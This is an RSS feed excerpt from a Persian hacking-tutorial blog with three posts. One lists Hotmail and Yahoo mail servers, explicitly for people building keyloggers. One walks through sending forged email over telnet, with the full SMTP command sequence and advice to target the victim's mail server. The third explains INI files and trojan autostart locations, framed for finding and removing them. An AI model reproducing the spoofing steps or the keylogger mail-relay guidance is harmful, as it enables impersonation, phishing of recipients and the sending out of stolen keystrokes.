					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=68</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=68</guid>
				</item>
			
				<item>
					<title><![CDATA[فیک میلر]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=67</link>
					<description><![CDATA[<P>به دلیل درخواست زیاد چند تا از دوستان که میخواستن ببینن برای کیلاگری که میسازند از چه smtp باید استفادهخ کنند این اموزش رو گذاشتم </P>
<P>smpt جدید هات میل:<FONT color=#0066ff>mx01.hotmail.com</FONT></P>
<P><FONT color=#0066ff><FONT color=#000000>SMTP های جدید یاهو به قرار زیر است:<BR><BR>e.mx.mail.yahoo.com<BR>f.mx.mail.yahoo.com<BR>g.mx.mail.yahoo.com<BR>a.mx.mail.yahoo.com<BR>b.mx.mail.yahoo.com<BR>c.mx.mail.yahoo.com<BR>d.mx.mail.yahoo.com</FONT><BR></FONT></P>
<P>mta125.mail.re4.yahoo.com </P>
<P>mta119.mail.re1.yahoo.com&nbsp;</P>
<P>&nbsp;mta144.mail.re1.yahoo.com </P>
<P>&nbsp;mta249.mail.mud.yahoo.com </P>
<P>1- یکی از ساده ترین راهها استفاده از سایتهایی مثل google است که با جستجوی عبارت SMTP Server، هزاران سرور پیدا کنیم. <BR>2- استفاده از SMTP Server سایت دانشگاهها. تجربه برایم ثابت کرده که این روش یکی از بهترینهاست. <BR>3- استفاده از یکسری SMTP Server های مشهور. این روش هم بد نیست. </P>
<P>حالا روش را عملاً نشانتان میدهم: <BR>اول باید یک سرور را مشخص کنید که از طریق آن می خواهید Fake Mail را بفرستید. همانطور که قبلاً گفتم، اگر مثلاً می خواهید برای یک نفر که Mail Box او در یاهو است، Fake Mail بزنید، سرور را همان سرور در نظر بگیرید یعنی از خود yahoo.com برای ارسال استفاده کنید. بعد باید ببینید که در این سرور کدام subdomain باید استفاده کنید (یعنی اینکه SMTP Server سرور آدرسش، mail.yahoo.com است یا mx.yahoo.com است یا چیز دیگر). برای این کار دو روش را میگوم: </P>
<P>1- از nslookup استفاده کنیم: <BR>اول باید با whois یک Name Server پیدا کنیم و بعد از طریق آن، سایت را nslookup کنیم. مثلاً میخواهم SMTP Server مربوط به KsN.com را پیدا کنم. اول یک whois میکنم و می بینم که Name Server سایت، s1.sazin.com و s2.sazin.com است. حالا nslookup میکنم و آن سطرهایی را می خوانم که با نام MX مشخص شده است و دو تا آدرس می بینم که عبارتند از: KsN.com و mail.KsN.com پس SMTP Server های سایت KsN.com همین دو آدرس است. در نتیجه اگر بخواهم از سایت KsN.com برای ارسال Fake Mail استفاده کنم، از این آدرسها باید بهره گیرم. </P>
<P>2- استفاده از بعضی سایتهای خاص: <BR>یکی از این سایتها، <A href="http://www.mob.net/~ted/tools/mx.php3">http://www.mob.net/~ted/tools/mx.php3</A> است. در این سایت، نام سایت را می نویسید و دکمه lookup را کلیک میکنید. مثلاً من نوشتم yahoo.com و به نتایج زیر رسیدم: </P>
<P>Domain Server: ns.mob.net <BR>yahoo.com mail is handled by 5 mx4.mail.yahoo.com. <BR>yahoo.com mail is handled by 1 mx1.mail.yahoo.com. <BR>yahoo.com mail is handled by 1 mx2.mail.yahoo.com. </P>
<P>Domain Server: ns.cw.net <BR>yahoo.com mail is handled by 5 mx4.mail.yahoo.com. <BR>yahoo.com mail is handled by 1 mx1.mail.yahoo.com. <BR>yahoo.com mail is handled by 1 mx2.mail.yahoo.com. </P>
<P><BR>مشخص است که SMTP Server های سایت yahoo.com عبارتند از: <BR>mx1.mail.yahoo.com, mx2.mail.yahoo.com, mx4.mail.yahoo.com</P>]]></description>
					<pubDate>Thu, 24 Apr 2008 13:51:25 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=67</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=67</guid>
				</item>
			
				<item>
					<title><![CDATA[فرستادن ایمیل جعلی از طریق تلنت]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=66</link>
					<description><![CDATA[<P>فرستادن ایمیل جعلی از طریق تلنت</P>
<P><BR>هر سرور برای ارسال ایمیل از پروتکل SMTP استفاده میکنه. این پروتکل توانایی خواندن E-mail را نداره و فقط می‌تونه E-mail بفرسته.پورت ۲۵ : این پورت ۲۵ برای ارسال E-mail به‌کار می‌ره و این پورت از برنامه های SMTP Server برای ارسال استفاده می کنه. برای صحبت کردن با پورت ۲۵ اول باید یک Server پیدا کنیم که پورت ۲۵ در آن باز باشه و بعد باید طبق معمول از telnet برای ارتباط استفاده کنیم.<BR>SMTP Server ها اهمیتی نمی‌دهند که شما کی هستید و به کی می‌خواهید میل بزنید، بلکه فقط کار خود را می‌کنند. پس به هر آدرس توجه کامل نکنین، شاید جعلی باشه&nbsp;&nbsp; چگونه یک SMTP سرور پیدا کنیم :<BR>کار سختی نیست. ولی ما توصیه می‌کنم از سروری کمک بگیرین که مربوط به Mail Box قربانی است. SMTP Server در نهایت روی یک سرور قرار دارد پس در حتما آدرس آن چیزی مثل smtp.noavar.com، mx01.hotmail.com و ... هست. <BR>سایت‌ google رو باز کنید و عبارت SMTP Server را سرچ کنین. هزاران سرور پیدا می کنین.زود برین به آدرس <A href="http://www.mob.net/~ted/tools/mx.php3">http://www.mob.net/~ted/tools/mx.php3</A> بعد نام سایت را می‌نویسین و دکمه lookup را کلیک می‌کنین.(مثلا yahoo.com ) و می بینین:<BR>Domain Server: ns.cw.net<BR>yahoo.com mail is handled by 5 mx4.mail.yahoo.com.<BR>yahoo.com mail is handled by 1 mx1.mail.yahoo.com.<BR>yahoo.com mail is handled by 1 mx2.mail.yahoo.com.<BR>مشخصه که SMTP Server های سایت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com , mx4.mail.yahoo.com<BR>&nbsp;خوب حالا میخوایم به یه نفر (مثلا ای میل بزنیم و میخوایم که طرف خیال کنه که از طرف <A href="mailto:test_zabet@yahoo.com">test_zabet@yahoo.com</A> است. (هر دو در سایت یاهو)&nbsp; برای این کاراز telnet برای برقراری ارتباط استفاده می کنم. دستور زیر را در اعلان داس تایپ کنین. <BR>telnet mx1.mail.yahoo.com 25 <BR>۲۵ همون شماره پورت ای میل هست و از سرور اصلی یاهو هم استفاده کردیم.خوب حالا شما باید این رو بینین:<BR>220 YSmtp mta499.mail.yahoo.com ESMTP service ready<BR>دقت کنید که چون از telnet استفاده می‌کنین، چیزهایی را که تایپ می‌کنین، نمی‌بینین و نمی‌تونید از دکمه BackSpace استفاده کنین.تایپ کنین HELO yahoo.com و جواب می‌شنویم: 250 mta499.mail.yahoo.com<BR>حالا باید مشخص کنم که E-mail فرستنده چیه. پس می‌نویسم: MAIL FROM:test_zabet@yahoo.com<BR>حالا باید بگم که این E-mail به چه آدرس ارسال بشه مثلآ RCPT TO: <A href="mailto:yaftz@yahoo.com">yaftz@yahoo.com</A><BR>&nbsp;وDATAحالا باید بنویسم&nbsp; Enter بزنم و جواب می‌شنوم:354 go ahead<BR>&nbsp;اینجا وقت تایپ کردن یک سری چیز‌های اساسی است. اول می‌نویسم<BR>From: R D <A href="mailto:test_zabet@yahoo.com">test_zabet@yahoo.com</A> این همان اسمی است که به عنوان Sender یا همان From دیده میشه. حالا می‌نویسم:salam و بعد Subject این هم در آن E-mail به عنوان subject دیده میشه. <BR>MIME-Version: 1.0<BR>Content-Type: text/plain;<BR>خوب دوبار Enter زده و متن نامه را می‌نویسم: <BR>دقت کنید که یک . (نقطه) در سطر آخر بنویسید و بعد Enter بزنید. با این روش به پورت ۲۵ میگیدکه متن نامه تمام شده. <BR>می‌نویسم QUIT تا ارتباط قطع و از telnet خارج بشیم</P>]]></description>
					<pubDate>Wed, 23 Apr 2008 13:37:20 GMT</pubDate>
					<comments>http://amozesheiranian.blogsky.com/Comments.bs?PostID=66</comments>
          <guid>http://amozesheiranian.blogsky.com?PostID=66</guid>
				</item>
			
				<item>
					<title><![CDATA[فایل های INI. چه هستند؟]]></title>
					<link>http://amozesheiranian.blogsky.com?PostID=65</link>
					<description><![CDATA[<P align=center><FONT color=#000080 size=5><SPAN lang=ar-sa>فایل</SPAN> های <SPAN lang=en-us>INI</SPAN>.<SPAN lang=en-us> </SPAN>چه هستند؟</FONT></P>
<P align=right><FONT style="FONT-SIZE: 11pt"><SPAN lang=ar-sa>این</SPAN> <SPAN lang=ar-sa>فایل</SPAN> ها در <SPAN lang=ar-sa>حقیقت</SPAN> <SPAN lang=ar-sa>فایل</SPAN> های <SPAN lang=ar-sa>متنی</SPAN> <SPAN lang=en-us>(TXT) </SPAN>ساده <SPAN lang=ar-sa>هستند، که بوسیله برنامه </SPAN><SPAN lang=en-us>Notepad</SPAN><SPAN lang=ar-sa> می توان یک فایل </SPAN><SPAN lang=en-us>(TXT)</SPAN><SPAN lang=ar-sa> را به سادگی ایجاد کرد. </SPAN>&nbsp;<SPAN lang=ar-sa>این</SPAN> <SPAN lang=ar-sa>فایل</SPAN> ها <SPAN lang=ar-sa>بوسیله</SPAN> و<SPAN lang=ar-sa>یند</SPAN>وز و برنامه های تحت <SPAN lang=ar-sa>ویندوز</SPAN> مورد استفاده قرار <SPAN lang=ar-sa>می گیرند</SPAN> تا اطلاعا<SPAN lang=ar-sa>تی</SPAN> در مورد خواسته های شما و <SPAN lang=ar-sa>محیط</SPAN> <SPAN lang=ar-sa>عملکر</SPAN>د خود ذ<SPAN lang=ar-sa>خیر</SPAN>ه <SPAN lang=ar-sa>کنند</SPAN>. <SPAN lang=en-us>INI</SPAN>.<SPAN lang=en-us> </SPAN>مخفف <SPAN lang=en-us>initialization </SPAN>است.</FONT></P>
<P align=right><FONT color=#000080><SPAN style="FONT-SIZE: 16pt">ساختار <SPAN lang=ar-sa>فایل</SPAN> <SPAN lang=en-us>INI</SPAN>.:</SPAN></FONT></P>
<P align=right><FONT style="FONT-SIZE: 11pt"><SPAN lang=ar-sa>فایل</SPAN> <SPAN lang=en-us>INI</SPAN>.<SPAN lang=en-us> </SPAN>شامل <SPAN lang=ar-sa>یک </SPAN>ی<SPAN lang=ar-sa>ا</SPAN> چند بخش است هر بخش با <SPAN lang=ar-sa>یک</SPAN> نام بخش <SPAN lang=en-us>(section name) </SPAN>آغاز <SPAN lang=ar-sa>می</SPAN> شود <SPAN lang=ar-sa>که</SPAN> <SPAN lang=ar-sa>ممکن</SPAN> است<SPAN lang=ar-sa>،</SPAN> <SPAN lang=ar-sa>هیچ</SPAN> <SPAN lang=ar-sa>یا</SPAN> <SPAN lang=ar-sa>چندین</SPAN> ورودی وجود داشته باشد</FONT><SPAN lang=ar-sa><FONT style="FONT-SIZE: 11pt">. که بعد از آن قرار می گیرد.</FONT></SPAN></P>
<P align=left><FONT style="FONT-SIZE: 11pt">[بخش]</FONT></P>
<P align=left><FONT style="FONT-SIZE: 11pt">ارزش=</FONT><SPAN lang=ar-sa style="FONT-SIZE: 11pt">نام کلید</SPAN></P>
<P align=right><FONT style="FONT-SIZE: 11pt">اگر تو<SPAN lang=ar-sa>ضیحی</SPAN> وجود داشته باشد بعد از<SPAN lang=ar-sa> «سمی کالن»</SPAN> <SPAN lang=en-us>(;) </SPAN><SPAN lang=ar-sa>قرار می گیرد.</SPAN></FONT></P>
<P align=right><FONT style="FONT-SIZE: 11pt">و<SPAN lang=ar-sa>یند</SPAN>وز از چند<SPAN lang=ar-sa>ین</SPAN> استاندارد برای <SPAN lang=ar-sa>فایل</SPAN> های <SPAN lang=en-us>INI</SPAN>.<SPAN lang=en-us> </SPAN>استفاده <SPAN lang=ar-sa>می کند</SPAN> تا اطلاعات <SPAN lang=ar-sa>پیکر</SPAN> بندی <SPAN lang=ar-sa>کامپیوتر</SPAN> را <SPAN lang=ar-sa>ذخیره کند</SPAN>. <SPAN lang=ar-sa>فایل هایی که این اطلاعات را نگهداری می کنند</SPAN> عبارتند از :</FONT></P>
<P align=left><SPAN lang=en-us><FONT style="FONT-SIZE: 11pt">WIN.INI, SYSTEM.INI, PROGMAN.INI, PROTOCOL.INI, SHARED.INI, WINFILE.INI, CONTROL.INI, SCHDPLUS.INI</FONT></SPAN></P>
<P align=right><FONT style="FONT-SIZE: 11pt">نرم افزارهای تحت و<SPAN lang=ar-sa>یند</SPAN>وز هم بعد از نصب شدن <SPAN lang=ar-sa>ممکن</SPAN> است قسمتها<SPAN lang=ar-sa>یی</SPAN> به <SPAN lang=en-us>WIN.INI </SPAN>اضافه <SPAN lang=ar-sa>کنند</SPAN> و <SPAN lang=ar-sa>همچنین</SPAN> خود <SPAN lang=ar-sa>فایل های</SPAN> <SPAN lang=en-us>INI. </SPAN>به <SPAN lang=ar-sa>دایرکتوری </SPAN>و<SPAN lang=ar-sa>یند</SPAN>وز اضافه <SPAN lang=ar-sa>کنند</SPAN>.</FONT></P>
<P align=right><FONT color=#000080><FONT style="FONT-SIZE: 16pt"><SPAN lang=ar-sa>ایجاد</SPAN> <SPAN lang=ar-sa>تغییرات</SPAN> در <SPAN lang=ar-sa>فایل</SPAN> های </FONT><SPAN lang=en-us><FONT style="FONT-SIZE: 16pt">INI.</FONT></SPAN></FONT></P>
<P align=right><FONT style="FONT-SIZE: 11pt">چون <SPAN lang=ar-sa>فایل</SPAN> های <SPAN lang=en-us>INI.</SPAN> از <SPAN lang=ar-sa>یک</SPAN> متن ساده استفاده <SPAN lang=ar-sa>می</SPAN> <SPAN lang=ar-sa>کنند</SPAN>. <SPAN lang=ar-sa>بوسیله</SPAN> <SPAN lang=ar-sa>یک</SPAN> برنامه <SPAN lang=ar-sa>متنی</SPAN> ساده<SPAN lang=ar-sa> مانند </SPAN><SPAN lang=en-us>Notepad</SPAN> <SPAN lang=ar-sa>می</SPAN> توانند <SPAN lang=ar-sa>ویرایش</SPAN> شوند.</FONT></P>
<P align=right><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">همانطور که در شماره قبل وعده داده بودیم، در این شماره به بررسی روشهای مختلف به کار گرفته شده توسط ترواها برای اجرا شدن با هر بار اجرای ویندوز می پردازیم تا بتوانیم از این طریق آنها را شناسایی و حذف کنیم. اگرچه به روشهای قدیمی هم اشاره مختصری خواهیم کرد، فقط به بررسی روشهای امروزی می پردازیم. با اینکه در مورد حذف ترواها بعداً بیشتر خواهیم نوشت، پس از مطالعه این مقاله شما باید بتوانید نه تنها ترواها، بلکه سایر برنامه های احتمالاً مزاحمی را که با هر بار اجرای ویندوز شما خود را اجرا می کنند بیابید. اگرچه این متن کمی تخصصی به نظر می رسد، اصلاً وحشت نکنید، یکبار آن را با حوصله بخوانید و سپس بار دوم ضمن خواندن متن، کارهای نوشته شده در آن را انجام دهید. </SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;روشهای مختلفی که یک برنامه می تواند از طریق آنها خود را با هر بار اجرای ویندوز اجرا کند عبارتند از:</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;1- استفاده از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">winstart.bat</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">: در این روش که مناسب ویندوزهای قدیمی است، فایلی به نام </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">winstart.bat</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> در شاحه ویندوز ساخته می شود و برنامه از این فایل فراخوانی می شود؛ به این صورت که اگر این فایل موجود نباشد ساخته می شود و در غیر این صورت فقط نام برنامه به آن اضافه می شود.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">2- استفاده از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">win.ini</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">: در این روش که امروزه زیاد مورد استفاده قرار نمی گیرد، با نوشتن عبارت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">load=filename.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> (که به جای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">filename.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> نام برنامه قرار می گیرد) یا </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run=filename.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">[windows]</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، برنامه مورد نظر با هر بار اجرای ویندوز اجرا خواهد شد. برای باز کردن فایل </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Win.ini</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و مشاهده محتویات آن، بهترین روش استفاده از برنامه </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System configuration editor</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> ویندوز است. برای اجرای این برنامه از منوی </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">R</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید)، تایپ کنید </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">SysEdit</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>و </SPAN></SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">OK</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید. از بین فایلهای باز شده فایل مورد نظر را پیدا کنید. اگر دقیقاً با این فایلها آشنایی ندارید، مواظب باشید که تغییری در این فایلها ندهید و اگر دادید، تغییرات خود را ضبط نکنید.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;3- استفاده از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System.ini</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">: این روش بسیار مشابه روش بالاست. و مانند بالا این فایل هم درون </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">System configuration editor</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> قابل مشاهده است. اگر در این فایل به عبارتی مشابه </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">shell=Explorer.exe trojan.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> برخورد کردید، سیستم شما بلافاصله پس از اجرای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">explorer.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">trojan.exe</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را اجرا خواهد کرد.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;4- استفاده از </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start up</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">: هر برنامه ای که در منوی </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> داخل قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Startup</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> قرار بگیرد، با هر بار اجرای ویندوز خود به خود اجرا خواهد شد. </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Startup</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> در ویندوزهای جدیدتر در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">All programs</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> منوی </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> قرار دارد.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;5- استفاده از رجیستری: این روش که در حال حاضر متداولترین روش مورد استفاد ترواها و کرمها می باشد به این صورت است که نام فایل اجرایی به قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> در رجیستری اضافه می گردد. رجیستری ویندوز حاوی اطلاعات مختلفی از سخت افزارها و نرم افزارهای گوناگون نصب شده روی سیستم شماست. برای مشاهده رجیستری، از منوی </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Start</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">R</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید) و در داخل جعبه متن آن تایپ کنید: </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RegEdit</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">OK</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> را فشار دهید. اگر دقیقاً با رجیستری آشنایی ندارید، مواظب باشید که تغییری در آن ندهید. از میان قسمتهای مختلف رجیستری در اینجا ما با </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_CURRENT_USER</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> و </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_LOCAL_MACHINE</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> سروکار داریم. یکی از ایندو را انتخاب کنید و روی آن </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Double Click</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> کنید (یا روی علامت + کنار آن کلیک کنید) حال به ترتیب گزینه های زیر را انتخاب کنید تا به </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> برسید:</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-INDENT: 18pt; MARGIN-RIGHT: 18pt; TEXT-ALIGN: center" align=center><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Software -&gt; Microsoft -&gt; Windows -&gt; Current Version -&gt; Run</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; در شرایطی که بیش از یک نفر از یک رایانه استفاده می کنند و روی آن کاربران مختلف تعریف کرده اند، معمولاً برنامه هایی که در قسمت </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> موجود در </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_LOCAL_MACHINE</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> نامشان نوشته شده باشد با هر بار اجرای ویندوز برای تمام کاربران آن اجرا می شوند اما برنامه هایی که نام آنها در </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">HKEY_CURRENT_USER</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> آمده باشد فقط برای کاربری که در حال حاضر از سیستم استفاده می کند اجرا خواهند شد.</SPAN></P>
<P class=MsoNormal dir=rtl style="TEXT-JUSTIFY: kashida; MARGIN-RIGHT: 18pt; TEXT-ALIGN: justify; TEXT-KASHIDA: 0%"><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ممکن است علاوه بر </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">Run</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، گزینه هایی به نامهای </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RunOnce</SPAN><SPAN lang=FA style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">، </SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RunServices</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>یا </SPAN></SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RunServicesOnce</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>را هم دیده باشید که آنها هم همین اثر را دارند با این تفاوت که اگر نام برنامه ای در </SPAN></SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RunOnce</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>یا </SPAN></SPAN><SPAN dir=ltr style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma">RunServicesOnce</SPAN><SPAN style="FONT-SIZE: 10.5pt; FONT-FAMILY: Tahoma"> <SPAN lang=FA>قرار بگیرد فقط یکبار یعنی فقط دفعه بعدی که ویندوز اجرا می شود به همراه ویندوز اجرا خواهد شد.</SPAN></SPAN></P>
